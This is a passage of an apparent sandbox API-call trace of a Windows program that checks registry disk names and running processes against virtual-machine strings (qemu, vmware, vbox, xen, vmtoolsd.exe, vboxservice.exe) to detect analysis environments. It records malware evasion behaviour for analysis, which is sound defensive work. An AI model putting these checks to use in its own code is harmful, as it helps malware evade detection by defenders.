KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.303] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="qemu") returned 0x0 [0110.303] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="virtio") returned 0x0 [0110.303] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vmware") returned 0x0 [0110.303] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="vbox") returned 0x0 [0110.303] wcsstr (_Str="cdromhl-dt-st_dvd-rom_gdr-t10n_______________1.05____", _SubStr="xen") returned 0x0 [0110.304] LocalFree (hMem=0x4148b0) returned 0x0 [0110.304] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.304] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0110.304] NtEnumerateKey (in: KeyHandle=0x80, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.305] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="qemu") returned 0x0 [0110.305] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="virtio") returned 0x0 [0110.305] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vmware") returned 0x0 [0110.305] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="vbox") returned 0x0 [0110.305] wcsstr (_Str="cdromlg_gh24ns70_____________________________ra19____", _SubStr="xen") returned 0x0 [0110.306] LocalFree (hMem=0x4148b0) returned 0x0 [0110.306] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.306] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0110.306] NtEnumerateKey (in: KeyHandle=0x80, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.307] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="qemu") returned 0x0 [0110.307] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="virtio") returned 0x0 [0110.307] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vmware") returned 0x0 [0110.307] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="vbox") returned 0x0 [0110.307] wcsstr (_Str="cdromlg_gh24ns90_____________________________io49____", _SubStr="xen") returned 0x0 [0110.307] LocalFree (hMem=0x4148b0) returned 0x0 [0110.307] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.307] LocalAlloc (uFlags=0x40, uBytes=0x7c) returned 0x4148b0 [0110.308] NtEnumerateKey (in: KeyHandle=0x80, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7c, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.309] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="qemu") returned 0x0 [0110.309] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="virtio") returned 0x0 [0110.309] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vmware") returned 0x0 [0110.309] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="vbox") returned 0x0 [0110.309] wcsstr (_Str="cdromteac_dv-518gs___________________________rj29____", _SubStr="xen") returned 0x0 [0110.309] LocalFree (hMem=0x4148b0) returned 0x0 [0110.309] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.310] LocalAlloc (uFlags=0x40, uBytes=0x7a) returned 0x4148b0 [0110.310] NtEnumerateKey (in: KeyHandle=0x80, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x7a, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.311] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="qemu") returned 0x0 [0110.311] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="virtio") returned 0x0 [0110.311] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vmware") returned 0x0 [0110.311] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="vbox") returned 0x0 [0110.311] wcsstr (_Str="disk0j38065/hts545050a7e680_________________gw28____", _SubStr="xen") returned 0x0 [0110.311] LocalFree (hMem=0x4148b0) returned 0x0 [0110.312] LocalFree (hMem=0x414878) returned 0x0 [0110.312] NtClose (Handle=0x80) returned 0x0 [0110.312] LocalFree (hMem=0x414768) returned 0x0 [0110.312] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0110.312] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0110.312] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0110.312] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0110.312] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.312] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0110.312] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0110.312] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0110.312] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4148b0 [0110.312] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x4148b0, Length=0x50, ResultLength=0x18ff50 | out: KeyInformation=0x4148b0, ResultLength=0x18ff50) returned 0x0 [0110.312] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="qemu") returned 0x0 [0110.313] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="virtio") returned 0x0 [0110.313] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vmware") returned 0x0 [0110.313] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="vbox") returned 0x0 [0110.313] wcsstr (_Str="disk&ven_dell&prod_virtual_disk", _SubStr="xen") returned 0x0 [0110.313] LocalFree (hMem=0x4148b0) returned 0x0 [0110.313] LocalFree (hMem=0x414878) returned 0x0 [0110.313] NtClose (Handle=0x80) returned 0x0 [0110.314] LocalFree (hMem=0x414768) returned 0x0 [0110.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x18ff5c | out: SystemInformation=0x0, ResultLength=0x18ff5c*=0x11978) returned 0xc0000004 [0110.314] LocalAlloc (uFlags=0x40, uBytes=0x12978) returned 0x4149b0 [0110.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4149b0, Length=0x12978, ResultLength=0x18ff5c | out: SystemInformation=0x4149b0, ResultLength=0x18ff5c*=0xdb88) returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0110.316] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.316] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.316] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.316] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.317] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.317] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.317] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.317] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="qga.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="windanr.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.318] wcsstr (_Str="lsm.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.318] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.319] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="qga.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="windanr.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.319] wcsstr (_Str="explorer.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.320] wcsstr (_Str="explorer.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.320] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.320] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.320] wcsstr (_Str="spoolsv.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.320] wcsstr (_Str="spoolsv.exe", _SubStr="qga.exe") returned 0x0 [0110.320] wcsstr (_Str="spoolsv.exe", _SubStr="windanr.exe") returned 0x0 [0110.320] wcsstr (_Str="spoolsv.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.320] wcsstr (_Str="spoolsv.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.321] wcsstr (_Str="spoolsv.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.321] wcsstr (_Str="spoolsv.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.321] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.321] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="qga.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="windanr.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.321] wcsstr (_Str="officeclicktorun.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="qga.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="windanr.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.322] wcsstr (_Str="taskhost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="qga.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="windanr.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiadap.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="qga.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="windanr.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.322] wcsstr (_Str="wmiprvse.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.323] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="qga.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="windanr.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.323] wcsstr (_Str="iexplore.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.323] wcsstr (_Str="sppsvc.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.323] wcsstr (_Str="sppsvc.exe", _SubStr="qga.exe") returned 0x0 [0110.323] wcsstr (_Str="sppsvc.exe", _SubStr="windanr.exe") returned 0x0 [0110.323] wcsstr (_Str="sppsvc.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.324] wcsstr (_Str="sppsvc.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.324] wcsstr (_Str="sppsvc.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.324] wcsstr (_Str="sppsvc.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="qga.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="windanr.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.324] wcsstr (_Str="indeed.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="qga.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="windanr.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.324] wcsstr (_Str="sometimesdifferentraise.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="qga.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="windanr.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.324] wcsstr (_Str="whatever.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.325] wcsstr (_Str="whatever.exe", _SubStr="prl_tools.exe") returned 0x0 [0110.325] wcsstr (_Str="however.exe", _SubStr="qemu-ga.exe") returned 0x0 [0110.325] wcsstr (_Str="however.exe", _SubStr="qga.exe") returned 0x0 [0110.325] wcsstr (_Str="however.exe", _SubStr="windanr.exe") returned 0x0 [0110.325] wcsstr (_Str="however.exe", _SubStr="vboxservice.exe") returned 0x0 [0110.325] wcsstr (_Str="however.exe", _SubStr="vboxtray.exe") returned 0x0 [0110.435] wcsstr (_Str="however.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0110.435] wcsstr (_Str="however.exe", _SubStr="prl_tools.exe") returned 0x0 